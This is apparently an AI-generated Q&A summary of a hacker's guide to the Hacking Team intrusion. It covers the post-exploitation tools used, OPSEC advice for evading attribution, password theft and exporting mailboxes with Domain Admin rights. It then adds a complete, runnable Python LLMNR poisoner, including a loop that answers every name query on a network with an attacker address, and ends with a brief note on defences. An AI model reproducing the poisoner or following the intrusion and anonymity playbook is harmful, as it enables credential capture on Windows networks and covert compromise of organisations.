
Phinphisher Hackback A Diy Guide

A summary of the offensive techniques, operational security and post-exploitation tooling described in the guide's case study, the Hacking Team intrusion.

This page contains AI-generated content. Errors or omissions may be present; apply human-level critical thinking.
  • Q: What specific tools did the author use for post-exploitation?
    A: Busybox, nmap, Responder.py, Python, tcpdump, dsniff, socat, screen, a SOCKS proxy server, and tgcd.
  • Q: How did the attacker initially gain access to Hacking Team?
    A: By exploiting a 0day in one of the embedded devices on Hacking Team's small internet-facing perimeter, found by port scanning the exposed hosts. The guide lists routers, VPN appliances and a spam-filtering appliance among them but deliberately does not say which device was exploited, and the exploit itself was not published.
  • Q: What is 'Responder.py' used for?
    A: Attacking Windows networks to capture credentials/hashes via LLMNR/NBT-NS poisoning when you have internal access but no domain user.
  • Q: How did the attacker access the 'Rete Sviluppo' (Development Network)?
    A: By finding a text file of passwords in Christian Pozzi's TrueCrypt volume, one of which gave access to a Nagios server that bridged the main network and the development network.
  • Q: What advice does the author give regarding attribution/OPSEC?
    A: Use new servers/domains, paid for with new bitcoin addresses, and avoid reusing tools or techniques linked to previous identities.
  • Q: What vulnerability opened the door to the Exchange server?
    A: Insecure backups found on iSCSI devices that were supposed to be on a separate network but were accessible from the main network.
  • Q: What is the purpose of the 'backdoored firmware' mentioned?
    A: To keep persistent access to the embedded device without re-running the exploit on every connection, so the 0day is used as few times as possible and is less likely to be noticed and burned.
  • Q: Why did the author use a virtual machine routed through Tor?
    A: To anonymize traffic and keep personal life separate from hacking activities.
  • Q: What does the author say about 'NoSQL' databases?
    A: They often lack authentication by default, making them easy targets ('NoAuthentication').
  • Q: How did the attacker download the email data?
    A: Using the Exchange PowerShell cmdlet New-MailboxExportRequest after gaining Domain Admin access.
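As an added illustration of the LLMNR poisoning that Responder.py relies on (example code written for this page, not taken from Responder or from the guide): a Windows host that fails to resolve a name via DNS multicasts an LLMNR query for it to 224.0.0.252:5355, and any host on the segment can answer with its own address. The query, the mistyped share name 'fileshrae', the transaction ID and the attacker address 10.0.0.5 are all constructed here; the listener at the end shows the exchange end to end but needs a real interface and is not exercised by the offline functions.

```python
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # LLMNR multicast group and port (RFC 4795)
LLMNR_PORT = 5355
QTYPE_A = 1
QCLASS_IN = 1
FLAG_QR = 0x8000               # header flag bit: 1 = response, 0 = query


def build_llmnr_query(txid: int, name: str) -> bytes:
    """Constructed LLMNR query, as a host multicasts it after DNS fails for
    `name`. The wire format is the same as a DNS query."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    qname = b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def _read_name(data: bytes, off: int):
    """Decode a label sequence (or a 2-byte compression pointer) at `off`."""
    if data[off] & 0xC0 == 0xC0:             # pointer: follow it, consume 2 bytes
        target = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
        return _read_name(data, target)[0], off + 2
    labels = []
    while data[off] != 0:
        length = data[off]
        labels.append(data[off + 1:off + 1 + length].decode())
        off += 1 + length
    return ".".join(labels), off + 1          # skip the root terminator


def parse_llmnr_query(data: bytes):
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", data[:12])
    if flags & FLAG_QR or qdcount != 1:
        return None                           # a response, or not a single question
    name, off = _read_name(data, 12)
    qtype, qclass = struct.unpack("!HH", data[off:off + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "question_end": off + 4}


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30):
    """Answer any A query with `attacker_ip`: the poisoner does not care which
    name was asked for, only that the victim will now connect to us."""
    q = parse_llmnr_query(query)
    if q is None or q["qtype"] != QTYPE_A or q["qclass"] != QCLASS_IN:
        return None
    header = struct.pack("!HHHHHH", q["txid"], FLAG_QR, 1, 1, 0, 0)
    question = query[12:q["question_end"]]            # echo the question section
    name_wire = query[12:q["question_end"] - 4]       # the name without QTYPE/QCLASS
    answer = (name_wire + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
              + socket.inet_aton(attacker_ip))
    return header + question + answer


def parse_llmnr_response(data: bytes):
    """What the victim's resolver sees: (name, ip) from the first A answer."""
    _, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if not flags & FLAG_QR or ancount < 1:
        return None
    off = 12
    for _ in range(qdcount):                  # skip the echoed question(s)
        _, off = _read_name(data, off)
        off += 4
    name, off = _read_name(data, off)
    rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
    off += 10
    if rtype != QTYPE_A or rdlen != 4:
        return None
    return name, socket.inet_ntoa(data[off:off + 4])


def listen_and_poison(attacker_ip: str, bind_ip: str = "0.0.0.0") -> None:
    """Join the LLMNR group and answer every A query with attacker_ip.
    Needs a real interface and the right to bind 5355; not run offline."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((bind_ip, LLMNR_PORT))
    mreq = socket.inet_aton(LLMNR_GROUP) + socket.inet_aton(bind_ip)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    while True:
        data, src = sock.recvfrom(2048)
        resp = build_poisoned_response(data, attacker_ip)
        if resp:
            sock.sendto(resp, src)            # unicast back to the querier's source port


if __name__ == "__main__":
    query = build_llmnr_query(0x1234, "fileshrae")    # constructed victim query
    resp = build_poisoned_response(query, "10.0.0.5")
    print(parse_llmnr_response(resp))                 # ('fileshrae', '10.0.0.5')
```

The poisoned answer on its own yields nothing; the value comes from what the victim does next, which is to open an SMB or HTTP connection to the returned address and authenticate, at which point a listener on the attacker side records the NTLM exchange. That listener side is what Responder.py provides and is not shown here. On the defensive side, the same behaviour is why LLMNR (and NBT-NS) are commonly turned off by group policy on managed Windows hosts, and why an unexpected host answering on 224.0.0.252:5355 is worth alerting on.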
